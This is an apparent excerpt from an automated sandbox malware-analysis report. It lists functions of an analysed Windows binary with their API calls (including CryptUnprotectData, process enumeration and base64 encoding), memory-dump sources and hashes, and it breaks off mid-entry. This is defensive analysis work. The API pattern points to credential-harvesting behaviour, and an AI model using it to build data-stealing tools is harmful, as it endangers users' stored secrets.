                            • Instruction Fuzzy Hash: B2B218F3A0C2009FE7086E2DEC8567AFBE9EF98320F1A453DE6C5C7744E63558058696
                            Function 00AA0DDE Relevance: 9.1, Strings: 6, Instructions: 1647COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: .KvG$@jj$a9Oa$iNs{$w\[$A}O
                            • API String ID: 0-3852754235
                            • Opcode ID: a51157b9e453b0cc3e6d584804bf4b284588601f0dc97e0228a8b65ad7b8eaf9
                            • Instruction ID: 70a21fd2b33d6fe21d87ce9671b28f77647767cd1d6dc894a60a125418cc6379
                            • Opcode Fuzzy Hash: a51157b9e453b0cc3e6d584804bf4b284588601f0dc97e0228a8b65ad7b8eaf9
                            • Instruction Fuzzy Hash: C1B23BF3A0C2109FE3046E2DEC9567AFBE9EF94720F1A4A3DE9C5D7744E63558008692
                            Function 00A9D794 Relevance: 9.1, Strings: 6, Instructions: 1608COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: &kY]$5,_g$?t_~$Bc_$q[${]
                            • API String ID: 0-2751062057
                            • Opcode ID: f452a50c7d1b00283696c645a8629935335a3c9e15cfcb5b7d8f9192a85c3584
                            • Instruction ID: b277f76109a1e6834eb5cecd7687673b0112e20ac070ed81ab674f2167df455a
                            • Opcode Fuzzy Hash: f452a50c7d1b00283696c645a8629935335a3c9e15cfcb5b7d8f9192a85c3584
                            • Instruction Fuzzy Hash: E1B215F3A0C2009FE3046E2DEC8567ABBE9EF94720F1A453DEAC5C7744EA3558058697
                            Function 006F2C10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 006F2C42
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006F2C49
                            • GetTimeZoneInformation.KERNEL32(?), ref: 006F2C58
                            • wsprintfA.USER32 ref: 006F2C83
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID: wwww
                            • API String ID: 3317088062-671953474
                            • Opcode ID: 12643c31c429d5d8a57c493510f5b2bd4c60cfe1617e358c0e36df880e646a37
                            • Instruction ID: 935f634934a49c22c4acfce611bc345e927b0f9ad3b05a5ede7cb32ec3d35226
                            • Opcode Fuzzy Hash: 12643c31c429d5d8a57c493510f5b2bd4c60cfe1617e358c0e36df880e646a37
                            • Instruction Fuzzy Hash: 4301F7B1A44604AFCB188B68DC09BAEB77DEB84721F004329F915D77C0D77419008AD1
                            Function 00A98728 Relevance: 7.9, Strings: 5, Instructions: 1668COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: '_v%$)g0'$0H{$Icu\$a[
                            • API String ID: 0-1835181370
                            • Opcode ID: 9bf12d1fd5e4bf984a4fbd6ade41dc52001bc1db186e7533a5062472675e1cb7
                            • Instruction ID: c2017107fa501bade05bf5f49897b950a57e2b8f7abca699cbb8599edf7b19ef
                            • Opcode Fuzzy Hash: 9bf12d1fd5e4bf984a4fbd6ade41dc52001bc1db186e7533a5062472675e1cb7
                            • Instruction Fuzzy Hash: 59B2F4F360C204AFE704AE2DEC8567ABBE5EF94320F16493DEAC5C3744E63598058697
                            Function 006D7750 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 006D775E
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006D7765
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 006D778D
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 006D77AD
                            • LocalFree.KERNEL32(?), ref: 006D77B7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            • Opcode ID: d6b7d4e1ec2ffa4803dbad775de16160989c6db0e6ff878a9a18a55f5f11f871
                            • Instruction ID: a8e4ce5c5377e5703d32cd406ba5b3aab1f0b59f7bb534fc87cb7b62354a2faf
                            • Opcode Fuzzy Hash: d6b7d4e1ec2ffa4803dbad775de16160989c6db0e6ff878a9a18a55f5f11f871
                            • Instruction Fuzzy Hash: CA011E75B54308BFEB10DBA49C4AFAA7B79EB44B11F104155FB09EB2C0D6B0A9009B90
                            Function 006F3A50 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 006F71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006F71FE
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006F3A96
                            • Process32First.KERNEL32(00000000,00000128), ref: 006F3AA9
                            • Process32Next.KERNEL32(00000000,00000128), ref: 006F3ABF
                              • Part of subcall function 006F7310: lstrlen.KERNEL32(------,006D5BEB), ref: 006F731B
                              • Part of subcall function 006F7310: lstrcpy.KERNEL32(00000000), ref: 006F733F
                              • Part of subcall function 006F7310: lstrcat.KERNEL32(?,------), ref: 006F7349
                              • Part of subcall function 006F7280: lstrcpy.KERNEL32(00000000), ref: 006F72AE
                            • CloseHandle.KERNEL32(00000000), ref: 006F3BF7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: decfc188d8e58289a44a2307c9b8cd855e36745ce62cda8c1dbfa33108173594
                            • Instruction ID: 9e40e30e8a471895807bd5b100070872c6248ec0457857e3032caa5cfc52c6ce
                            • Opcode Fuzzy Hash: decfc188d8e58289a44a2307c9b8cd855e36745ce62cda8c1dbfa33108173594
                            • Instruction Fuzzy Hash: 1681F370909229CFC754CF18C998BA5B7B2FB54324F29C1A9D5089B3B2D7769D82CB80
                            Function 006DEA30 Relevance: 6.1, APIs: 4, Instructions: 98stringencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 006DEA76
                            • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 006DEA7E
                            • lstrcat.KERNEL32(006FCFEC,006FCFEC), ref: 006DEB27
                            • lstrcat.KERNEL32(006FCFEC,006FCFEC), ref: 006DEB49
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: fc1718df66b34628f2e3467670e7fda039a9c462af7473abfd9b26b62c6e5937
                            • Instruction ID: 14c2220d788772265b1a92ff1b3a15f351c563e501ec91a4a50611ac0f4a0405
                            • Opcode Fuzzy Hash: fc1718df66b34628f2e3467670e7fda039a9c462af7473abfd9b26b62c6e5937
                            • Instruction Fuzzy Hash: 0D31E175B14119ABDB109B98EC45FEFB77ADF44715F0040AAFA09E7240DBB05A048BA1
                            Function 006F40B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 006F40CD
                            • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 006F40DC
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006F40E3
                            • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 006F4113
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptHeapString$AllocateProcess
                            • String ID:
                            • API String ID: 3825993179-0
                            • Opcode ID: 0ed6fa3938521aa51239f22e9c3f6f4730e65bd90890d79894763301e31acd2a
                            • Instruction ID: 55e8da1a0e2746796deec4bd14017fd8e6cbac445efdc2eb2e98d6e6b3ef3374
                            • Opcode Fuzzy Hash: 0ed6fa3938521aa51239f22e9c3f6f4730e65bd90890d79894763301e31acd2a
                            • Instruction Fuzzy Hash: EE015A70600209AFDB109FA5DC89BABBBAEEF85311F108069BE48C7340DE719940DBA4
                            Function 006F2B60 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,006FA3D0,000000FF), ref: 006F2B8F
                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 006F2B96
                            • GetLocalTime.KERNEL32(?,?,00000000,006FA3D0,000000FF), ref: 006F2BA2
                            • wsprintfA.USER32 ref: 006F2BCE
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            • Opcode ID: 56a53ef598552d39477f6cb3b8810c8eaf9e47253dcbc805b1211e1bfd328332
                            • Instruction ID: f30840b27132f4141943c4305b71f3a3f9a9503cce5e3da1d4efeb5e113d5fd7
                            • Opcode Fuzzy Hash: 56a53ef598552d39477f6cb3b8810c8eaf9e47253dcbc805b1211e1bfd328332
                            • Instruction Fuzzy Hash: DE0180B2918128ABCB109BC9DC45BBFB7BCFB4CB11F00010AF645A2280E7780400D7B1
                            Function 006D9B20 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 006D9B3B
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 006D9B4A
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 006D9B61
                            • LocalFree.KERNEL32 ref: 006D9B70
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID:
                            • API String ID: 4291131564-0
                            • Opcode ID: aec770a99f673b6b3085b85c0e9deeb0f2280f4b39bc31dd20eea8477c770ac9
